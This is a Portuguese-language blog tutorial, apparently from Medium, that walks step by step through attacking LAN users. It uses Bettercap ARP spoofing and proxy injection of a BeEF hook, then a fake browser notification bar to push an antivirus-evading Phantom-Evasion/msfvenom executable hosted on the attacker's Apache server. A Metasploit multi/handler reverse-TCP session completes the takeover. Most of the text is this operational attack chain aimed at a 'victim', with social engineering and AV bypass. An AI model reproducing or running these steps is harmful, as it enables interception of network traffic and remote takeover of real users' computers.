Bettercap + beef xss + payload = invólucro reverso

Joas Antonio
5 min readMar 5, 2019

--

Muitos sistemas operacionais de pentest contam com inúmeras ferramentas. São tantas ferramentas que até ficamos perdidos e, nos perguntamos, qual a necessidade de haver várias ferramentas sendo algumas com quase a mesma funcionalidade?

As vezes é algo até sem necessidade mas, já tentou mesclar ou combinar alguma dessas ferramentas?

Então veja um exemplo que o nosso amigo BOOT SANTOS fez mesclando algumas ferramentas:

VÍDEO PRÁTICO

Agora vamos ao tutorial passo a passo?

Primeiramente vamos ver a funcionalidade dessas ferramentas?

BETTERCAP

O bettercap é um framework poderoso, facilmente extensível e portátil escrito em Go, que tem como objetivo oferecer aos pesquisadores de segurança, teamers vermelhos e engenheiros reversos uma solução fácil de usar , tudo-em-um com todos os recursos necessários para realizar reconhecimentos e ataques Redes WiFi , dispositivos Bluetooth Low Energy , dispositivos HID wireless e redes Ethernet .

Para instalar no Kali Linux digite: apt-get update && apt-get install bettercap

BEEF-XSS

BeEF é a abreviatura de The Browser Exploitation Framework. É uma ferramenta de teste de penetração focada no navegador da web. Em meio a crescentes preocupações sobre ataques pela Web contra clientes, incluindo clientes móveis, o BeEF permite que o testador de penetração profissional avalie a postura real de segurança de um ambiente de destino usando vetores de ataque do lado do cliente. Ao contrário de outras estruturas de segurança, o BeEF analisa o perímetro da rede e o sistema cliente, e examina a capacidade de exploração dentro do contexto de uma única porta aberta: o navegador da web. O BeEF conectará um ou mais navegadores da Web e os usará como cabeças de ponte para o lançamento de módulos de comando direcionados e outros ataques contra o sistema a partir do contexto do navegador.

Para instalar: git clone https://github.com/beefproject/beef

ARP SPOOFING

Em redes de computadores, ARP spoofing ou ARP cache poisoning é uma técnica em que um atacante envia mensagens ARP (Address Resolution Protocol) com o intuito de associar seu endereço MAC ao endereço IP de outro host, como por exemplo, o endereço IP do gateway padrão, fazendo com que todo o tráfego seja enviado para o endereço IP do atacante ao invés do endereço IP do gateway.

O ARP spoofing permite com que o atacante intercepte quadros trafegados na rede, modifique os quadros trafegados e até é capaz de parar todo o tráfego. Esse tipo de ataque só ocorre em segmentos da rede de área local (local area networks — LAN) que usam o ARP para fazer a resolução de endereços IP em endereços da camada de enlace.

Agora vamos a prática?

Primeiramente você irá necessitar de um código em javascript para fazer a injeção do beef com o bettercap

Após montar o código salve como desejar, no caso é costumeiro salvar como beef-inject.js, mas vai de cada um…

Agora vamos ao passo a passo

1.Execute o beef-xss

2. Acesse pelo browser o ip http://127.0.0.1:3000/ui/panel

3. Agora, execute o Bettercap

4. Digite: net.show (Verifica os endereços de IP, Mac Address e as máquinas conectadas na rede)

5. Crie um código para fazer a injeção do beef no bettercap como vimos acima

6. No bettercap digite: set http.proxy.script “Caminho do script beef-inject.js” (Ele injeta o beef-xss como um proxy)

7. Em seguida digite: http.proxy on (para ativar)

8. Depois digite: arp.spoof on (para fazer o spoofing na rede)

9. No exemplo foi usado o site: www.sisu.mec.gov.br

10. No beef vá em online browser e procure o site acima ou outro que a vítima estiver usando, clique em cima do alvo

11. Agora vá em “current browser” em “commands” depois, “Social Engineering”

12. Clique em “Fake notification bar (chrome) ou (Firefox) ou (IE)”

13. E, com isso, você pode mudar a mensagem de notificação e aplicar uma engenharia social

14. Agora, você baixa um script para fazer Evasão e bypass do AV na máquina da vitima, digite: git clone https://github.com/oddcod3/Phantom-Evasion (com ele vamos gerar nosso payload para evasão)

15. Com isso, digite o seguinte comando: python phantom-evasion.py

16. Após isso, aparecerá um menu e de lá você pode selecionar as opções que deseja para gerar um payload

17. Um exemplo de opções é: 1 (Windows Module), 1 (Shell code Injection), 3 (VirtualAlloc No directcall), Enter (Continue) e 1 (Msfvenom)

18. Agora, digite o ip da sua máquina atacante e a porta, e em seguida, jogue o payload gerado no /var/www/html

19. Após isso, ative o serviço do apache2 na sua máquina, comando: service apache2 start

20. Abra o msfconsole e digite: use exploit multi/handler

21. Em seguida, digite: set payload windows/shell/reverse_tcp

22. Dê um show options e configure o LHOST e o LPORT do payload sendo igual ao do payload gerado com Phantom-evasion

23. Volte no “Fake Notification bar” seja o que você estiver usando para atacar

24. Na URL, digite: IP DO ATACANTE/nomedopayload.exe

URL: O PAYLOAD HOSPEDADO NO SERVIDOR APACHE2 DO ATACANTE

25. Depois de todo esse processo, digite: “Execute”

26. No msfconsole inicie a conexão, digitando: exploit

27. Irá aparecer um pop-up com uma notificação no site que a pessoa está navegando

28. Espera a pessoa instalar o plugin e executa-lo que, no caso, é o nosso payload

29. Pronto! Você consegue obter acesso a máquina da vitima.

Caso queira saber mais algumas funcionalidades das ferramentas, acesse: https://github.com/bettercap/bettercap/issues/290

https://github.com/oddcod3/Phantom-Evasion

https://www.bettercap.org/basic-usage/

CURTA AS PÁGINAS:

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

--

--

No responses yet

Write a response